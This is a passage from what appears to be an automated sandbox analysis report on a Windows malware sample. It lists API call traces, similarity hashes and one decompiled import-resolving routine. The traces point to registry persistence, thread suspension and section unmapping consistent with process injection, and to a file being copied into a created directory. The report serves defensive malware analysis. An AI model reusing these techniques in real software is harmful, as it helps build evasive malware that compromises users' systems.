    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • UnmapViewOfFile.KERNEL32(?,?,?,?,00000000,00000001), ref: 001C4DBC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C4DCE
  • DeleteFileW.KERNEL32(?), ref: 001C4DDC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: 7849c8b9b33a94634046e8246dea9d068437be0b98cf428e6df4f247afe7f281
  • Instruction ID: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
  • Opcode Fuzzy Hash: F1F0278087CDC3C3CA49888A09653622058EFE2B45CBC9398B4803901C1FA03D6A2B8E
  • Instruction Fuzzy Hash: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
APIs
  • PathFindFileNameW.SHLWAPI(01B3618C), ref: 01B31246
  • lstrcmpiW.KERNEL32(00000000,?,01B37494), ref: 01B3124D
  • RegOpenKeyExA.ADVAPI32(80000001,01B38080,00000000,00000000,?,?,01B37494), ref: 01B3127E
  • lstrlenW.KERNEL32(?,01B37494), ref: 01B31292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 01B312AA
  • RegQueryValueExW.ADVAPI32(?,00000000,01B37494,00000000,01B37494,?,01B37494), ref: 01B312C9
  • StrStrIW.SHLWAPI(00000000), ref: 01B312E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B312F9
  • RegCloseKey.ADVAPI32(?,?,01B37494), ref: 01B31302
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 193527b1eef174f7d3812915e618651906c6adafd0bce5f2d714c946695c6d1b
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: A7F02E4D155F71CAE17D2005187BBAA70C3F39671BD25E9031552B31076991B3292FCC
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44);
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,004015E0,?), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,004015E0,?), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,004015E0,?), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
